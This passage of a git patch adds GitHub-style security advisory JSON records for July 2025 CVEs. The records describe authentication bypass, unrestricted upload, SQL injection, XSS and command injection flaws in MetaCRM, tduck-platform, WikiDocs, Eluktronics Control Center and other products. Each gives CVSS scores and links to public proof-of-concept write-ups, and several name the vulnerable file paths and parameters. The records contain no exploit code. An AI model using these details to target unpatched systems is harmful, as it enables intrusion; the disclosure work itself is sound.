"2025-07-20T09:32:40Z", + "aliases": [ + "CVE-2025-7875" + ], + "details": "A vulnerability classified as critical has been found in Metasoft 美特软件 MetaCRM up to 6.4.2. This affects an unknown part of the file /debug.jsp. The manipulation leads to improper authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7875" + }, + { + "type": "WEB", + "url": "https://github.com/FightingLzn9/vul/blob/main/MetaCRM6-SIL-2.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316989" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316989" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T08:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-vrj5-2cpp-xrhh/GHSA-vrj5-2cpp-xrhh.json b/advisories/unreviewed/2025/07/GHSA-vrj5-2cpp-xrhh/GHSA-vrj5-2cpp-xrhh.json new file mode 100644 index 0000000000000..357543f21a744 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-vrj5-2cpp-xrhh/GHSA-vrj5-2cpp-xrhh.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrj5-2cpp-xrhh", + "modified": "2025-07-20T09:32:40Z", + "published": "2025-07-20T09:32:40Z", + "aliases": [ + "CVE-2025-7878" + ], + "details": "A vulnerability, which was classified as critical, was found in Metasoft 美特软件 MetaCRM up to 6.4.2. Affected is an unknown function of the file /common/jsp/upload2.jsp. The manipulation of the argument File leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7878" + }, + { + "type": "WEB", + "url": "https://github.com/FightingLzn9/vul/blob/main/MetaCRM6-Upload-5.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316992" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316992" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.611267" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T09:15:23Z" + } +} \ No newline at end of file From 18b45122d8fdc37de8c6aa7424e01ae3f62bb13b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 20 Jul 2025 12:32:01 +0000 Subject: [PATCH 035/323] Publish Advisories GHSA-2gq8-6j4j-m6j2 GHSA-36fg-v524-g4r4 GHSA-4m3f-8qmg-8c9p GHSA-6329-8qfc-vx95 GHSA-66g2-r73r-39w9 GHSA-9cg4-9hv5-3376 GHSA-f4pg-w29q-pm6g GHSA-p65m-fhpg-ph97 GHSA-xrf9-vprm-8m66 --- .../GHSA-2gq8-6j4j-m6j2.json | 60 +++++++++++++++++++ .../GHSA-36fg-v524-g4r4.json | 52 ++++++++++++++++ .../GHSA-4m3f-8qmg-8c9p.json | 52 ++++++++++++++++ .../GHSA-6329-8qfc-vx95.json | 52 ++++++++++++++++ .../GHSA-66g2-r73r-39w9.json | 52 ++++++++++++++++ .../GHSA-9cg4-9hv5-3376.json | 56 +++++++++++++++++ .../GHSA-f4pg-w29q-pm6g.json | 52 ++++++++++++++++ .../GHSA-p65m-fhpg-ph97.json | 52 ++++++++++++++++ .../GHSA-xrf9-vprm-8m66.json | 52 ++++++++++++++++ 9 files changed, 480 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-2gq8-6j4j-m6j2/GHSA-2gq8-6j4j-m6j2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-36fg-v524-g4r4/GHSA-36fg-v524-g4r4.json create mode 100644 advisories/unreviewed/2025/07/GHSA-4m3f-8qmg-8c9p/GHSA-4m3f-8qmg-8c9p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6329-8qfc-vx95/GHSA-6329-8qfc-vx95.json create mode 100644 advisories/unreviewed/2025/07/GHSA-66g2-r73r-39w9/GHSA-66g2-r73r-39w9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9cg4-9hv5-3376/GHSA-9cg4-9hv5-3376.json create mode 100644 advisories/unreviewed/2025/07/GHSA-f4pg-w29q-pm6g/GHSA-f4pg-w29q-pm6g.json create mode 100644 advisories/unreviewed/2025/07/GHSA-p65m-fhpg-ph97/GHSA-p65m-fhpg-ph97.json create mode 100644 advisories/unreviewed/2025/07/GHSA-xrf9-vprm-8m66/GHSA-xrf9-vprm-8m66.json diff --git a/advisories/unreviewed/2025/07/GHSA-2gq8-6j4j-m6j2/GHSA-2gq8-6j4j-m6j2.json b/advisories/unreviewed/2025/07/GHSA-2gq8-6j4j-m6j2/GHSA-2gq8-6j4j-m6j2.json new file mode 100644 index 0000000000000..caea0b5974bd8 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2gq8-6j4j-m6j2/GHSA-2gq8-6j4j-m6j2.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2gq8-6j4j-m6j2", + "modified": "2025-07-20T12:30:27Z", + "published": "2025-07-20T12:30:27Z", + "aliases": [ + "CVE-2025-7887" + ], + "details": "A vulnerability has been found in Zavy86 WikiDocs up to 1.0.78 and classified as problematic. This vulnerability affects unknown code of the file template.inc.php. The manipulation of the argument path leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7887" + }, + { + "type": "WEB", + "url": "https://github.com/Zavy86/WikiDocs/issues/256" + }, + { + "type": "WEB", + "url": "https://github.com/Zavy86/WikiDocs/issues/256#issue-3201516458" + }, + { + "type": "WEB", + "url": "https://github.com/Zavy86/WikiDocs/issues/256#issuecomment-3034714777" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317002" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317002" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.609063" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T12:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-36fg-v524-g4r4/GHSA-36fg-v524-g4r4.json b/advisories/unreviewed/2025/07/GHSA-36fg-v524-g4r4/GHSA-36fg-v524-g4r4.json new file mode 100644 index 0000000000000..50afbda31928c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-36fg-v524-g4r4/GHSA-36fg-v524-g4r4.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-36fg-v524-g4r4", + "modified": "2025-07-20T12:30:26Z", + "published": "2025-07-20T12:30:26Z", + "aliases": [ + "CVE-2025-7882" + ], + "details": "A vulnerability was found in Mercusys MW301R 1.0.2 Build 190726 Rel.59423n. It has been rated as problematic. This issue affects some unknown processing of the component Login. The manipulation leads to improper restriction of excessive authentication attempts. The attack can only be initiated within the local network. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7882" + }, + { + "type": "WEB", + "url": "https://github.com/RaulPazemecxas/PoCVulDb/blob/main/README21.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316997" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316997" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.611431" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-307" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T11:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4m3f-8qmg-8c9p/GHSA-4m3f-8qmg-8c9p.json b/advisories/unreviewed/2025/07/GHSA-4m3f-8qmg-8c9p/GHSA-4m3f-8qmg-8c9p.json new file mode 100644 index 0000000000000..dfb2adaf2d5f9 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4m3f-8qmg-8c9p/GHSA-4m3f-8qmg-8c9p.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4m3f-8qmg-8c9p", + "modified": "2025-07-20T12:30:26Z", + "published": "2025-07-20T12:30:26Z", + "aliases": [ + "CVE-2025-7883" + ], + "details": "A vulnerability classified as critical has been found in Eluktronics Control Center 5.23.51.41. Affected is an unknown function of the file \\AiStoneService\\MyControlCenter\\Command of the component Powershell Script Handler. The manipulation leads to command injection. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7883" + }, + { + "type": "WEB", + "url": "https://drive.proton.me/urls/V5KQBBTH4G#VKpByTUTOWUW" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316998" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316998" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.611432" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T11:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6329-8qfc-vx95/GHSA-6329-8qfc-vx95.json b/advisories/unreviewed/2025/07/GHSA-6329-8qfc-vx95/GHSA-6329-8qfc-vx95.json new file mode 100644 index 0000000000000..b1dc971f2f42d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6329-8qfc-vx95/GHSA-6329-8qfc-vx95.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6329-8qfc-vx95", + "modified": "2025-07-20T12:30:26Z", + "published": "2025-07-20T12:30:26Z", + "aliases": [ + "CVE-2025-7880" + ], + "details": "A vulnerability was found in Metasoft 美特软件 MetaCRM up to 6.4.2 and classified as critical. Affected by this issue is some unknown functionality of the file /business/common/sms/sendsms.jsp. The manipulation of the argument File leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7880" + }, + { + "type": "WEB", + "url": "https://github.com/FightingLzn9/vul/blob/main/MetaCRM-Upload-7.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316994" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316994" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.611336" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T10:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-66g2-r73r-39w9/GHSA-66g2-r73r-39w9.json b/advisories/unreviewed/2025/07/GHSA-66g2-r73r-39w9/GHSA-66g2-r73r-39w9.json new file mode 100644 index 0000000000000..5be57509406f9 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-66g2-r73r-39w9/GHSA-66g2-r73r-39w9.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-66g2-r73r-39w9", + "modified": "2025-07-20T12:30:27Z", + "published": "2025-07-20T12:30:27Z", + "aliases": [ + "CVE-2025-7886" + ], + "details": "A vulnerability, which was classified as critical, was found in pmTicket Project-Management-Software up to 2ef379da2075f4761a2c9029cf91d073474e7486. This affects the function getUserLanguage of the file classes/class.database.php. The manipulation of the argument user_id leads to sql injection. It is possible to initiate the attack remotely. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7886" + }, + { + "type": "WEB", + "url": "https://asciinema.org/a/3wu3WGpnrnMc2GDvSyLUqqHUF" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317001" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317001" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.614534" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T12:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9cg4-9hv5-3376/GHSA-9cg4-9hv5-3376.json b/advisories/unreviewed/2025/07/GHSA-9cg4-9hv5-3376/GHSA-9cg4-9hv5-3376.json new file mode 100644 index 0000000000000..367fe09db8fe7 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9cg4-9hv5-3376/GHSA-9cg4-9hv5-3376.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9cg4-9hv5-3376", + "modified": "2025-07-20T12:30:27Z", + "published": "2025-07-20T12:30:27Z", + "aliases": [ + "CVE-2025-7885" + ], + "details": "A vulnerability, which was classified as problematic, has been found in Huashengdun WebSSH up to 1.6.2. Affected by this issue is some unknown functionality of the component Login Page. The manipulation of the argument hostname/port leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7885" + }, + { + "type": "WEB", + "url": "https://github.com/huashengdun/webssh/issues/410" + }, + { + "type": "WEB", + "url": "https://github.com/4m3rr0r/PoCVulDb/blob/main/CVE-2025-7885.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317000" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317000" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.613610" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T12:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-f4pg-w29q-pm6g/GHSA-f4pg-w29q-pm6g.json b/advisories/unreviewed/2025/07/GHSA-f4pg-w29q-pm6g/GHSA-f4pg-w29q-pm6g.json new file mode 100644 index 0000000000000..4ce72b99c5461 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-f4pg-w29q-pm6g/GHSA-f4pg-w29q-pm6g.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f4pg-w29q-pm6g", + "modified": "2025-07-20T12:30:26Z", + "published": "2025-07-20T12:30:26Z", + "aliases": [ + "CVE-2025-7884" + ], + "details": "A vulnerability classified as problematic was found in Eluktronics Control Center 5.23.51.41. Affected by this vulnerability is an unknown functionality of the component REG File Handler. The manipulation leads to insufficient verification of data authenticity. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7884" + }, + { + "type": "WEB", + "url": "https://drive.proton.me/urls/5PQ1VRZ3CG#M2JyUWapaX85" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316999" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316999" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.611436" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T11:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-p65m-fhpg-ph97/GHSA-p65m-fhpg-ph97.json b/advisories/unreviewed/2025/07/GHSA-p65m-fhpg-ph97/GHSA-p65m-fhpg-ph97.json new file mode 100644 index 0000000000000..31dcdb7a07e10 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-p65m-fhpg-ph97/GHSA-p65m-fhpg-ph97.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p65m-fhpg-ph97", + "modified": "2025-07-20T12:30:27Z", + "published": "2025-07-20T12:30:27Z", + "aliases": [ + "CVE-2025-7888" + ], + "details": "A vulnerability was found in TDuckCloud tduck-platform 5.1 and classified as critical. This issue affects the function UserFormDataMapper of the file src/main/java/com/tduck/cloud/form/mapper/UserFormDataMapper.java. The manipulation of the argument formKey leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7888" + }, + { + "type": "WEB", + "url": "https://github.com/kaixliu56/public_vulns/blob/main/TDuck-sqli.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317003" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317003" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.615210" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T12:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-xrf9-vprm-8m66/GHSA-xrf9-vprm-8m66.json b/advisories/unreviewed/2025/07/GHSA-xrf9-vprm-8m66/GHSA-xrf9-vprm-8m66.json new file mode 100644 index 0000000000000..cdf37bc612367 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-xrf9-vprm-8m66/GHSA-xrf9-vprm-8m66.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xrf9-vprm-8m66", + "modified": "2025-07-20T12:30:26Z", + "published": "2025-07-20T12:30:26Z", + "aliases": [ + "CVE-2025-7881" + ], + "details": "A vulnerability was found in Mercusys MW301R 1.0.2 Build 190726 Rel.59423n. It has been declared as problematic. This vulnerability affects unknown code of the component Web Interface. The manipulation of the argument code leads to weak password recovery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7881" + }, + { + "type": "WEB", + "url": "https://github.com/RaulPazemecxas/PoCVulDb/blob/main/README20.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316996" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316996" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.611328" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-640" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T10:15:25Z" + } +} \ No newline at end of file From f7fbfa4f6ae7232f608e8115bfa7afb28dd41fb7 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 20 Jul 2025 15:32:04 +0000 Subject: [PATCH 036/323] Publish Advisories GHSA-2m27-4f25-w53w GHSA-4qpq-7frv-mpfw GHSA-656m-7xwx-9vrp GHSA-89p2-5qg7-rj57 GHSA-cmv4-w733-w8cj GHSA-frjw-rj7c-pv43 GHSA-h842-f758-5xgc GHSA-hv33-w2jr-7q49 GHSA-jc76-cg2q-pp7h GHSA-ph47-hpx7-mghq GHSA-q6m4-vcrr-c6mx GHSA-vj32-5645-8hm6 GHSA-vj4v-72c4-7jpw --- .../GHSA-2m27-4f25-w53w.json | 56 +++++++++++++++++++ .../GHSA-4qpq-7frv-mpfw.json | 36 ++++++++++++ .../GHSA-656m-7xwx-9vrp.json | 52 +++++++++++++++++ .../GHSA-89p2-5qg7-rj57.json | 36 ++++++++++++ .../GHSA-cmv4-w733-w8cj.json | 36 ++++++++++++ .../GHSA-frjw-rj7c-pv43.json | 56 +++++++++++++++++++ .../GHSA-h842-f758-5xgc.json | 48 ++++++++++++++++ .../GHSA-hv33-w2jr-7q49.json | 56 +++++++++++++++++++ .../GHSA-jc76-cg2q-pp7h.json | 36 ++++++++++++ .../GHSA-ph47-hpx7-mghq.json | 56 +++++++++++++++++++ .../GHSA-q6m4-vcrr-c6mx.json | 52 +++++++++++++++++ .../GHSA-vj32-5645-8hm6.json | 56 +++++++++++++++++++ .../GHSA-vj4v-72c4-7jpw.json | 48 ++++++++++++++++ 13 files changed, 624 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-2m27-4f25-w53w/GHSA-2m27-4f25-w53w.json create mode 100644 advisories/unreviewed/2025/07/GHSA-4qpq-7frv-mpfw/GHSA-4qpq-7frv-mpfw.json create mode 100644 advisories/unreviewed/2025/07/GHSA-656m-7xwx-9vrp/GHSA-656m-7xwx-9vrp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-89p2-5qg7-rj57/GHSA-89p2-5qg7-rj57.json create mode 100644 advisories/unreviewed/2025/07/GHSA-cmv4-w733-w8cj/GHSA-cmv4-w733-w8cj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-frjw-rj7c-pv43/GHSA-frjw-rj7c-pv43.json create mode 100644 advisories/unreviewed/2025/07/GHSA-h842-f758-5xgc/GHSA-h842-f758-5xgc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-hv33-w2jr-7q49/GHSA-hv33-w2jr-7q49.json create mode 100644 advisories/unreviewed/2025/07/GHSA-jc76-cg2q-pp7h/GHSA-jc76-cg2q-pp7h.json create mode 100644 advisories/unreviewed/2025/07/GHSA-ph47-hpx7-mghq/GHSA-ph47-hpx7-mghq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q6m4-vcrr-c6mx/GHSA-q6m4-vcrr-c6mx.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vj32-5645-8hm6/GHSA-vj32-5645-8hm6.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vj4v-72c4-7jpw/GHSA-vj4v-72c4-7jpw.json diff --git a/advisories/unreviewed/2025/07/GHSA-2m27-4f25-w53w/GHSA-2m27-4f25-w53w.json b/advisories/unreviewed/2025/07/GHSA-2m27-4f25-w53w/GHSA-2m27-4f25-w53w.json new file mode 100644 index 0000000000000..a2f21bbd73b69 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2m27-4f25-w53w/GHSA-2m27-4f25-w53w.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2m27-4f25-w53w", + "modified": "2025-07-20T15:30:27Z", + "published": "2025-07-20T15:30:27Z", + "aliases": [ + "CVE-2025-7891" + ], + "details": "A vulnerability was found in InstantBits Web Video Cast App up to 5.12.4 on Android. It has been rated as problematic. Affected by this issue is some unknown functionality of the file AndroidManifest.xml of the component com.instantbits.cast.webvideo. The manipulation leads to improper export of android application components. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not 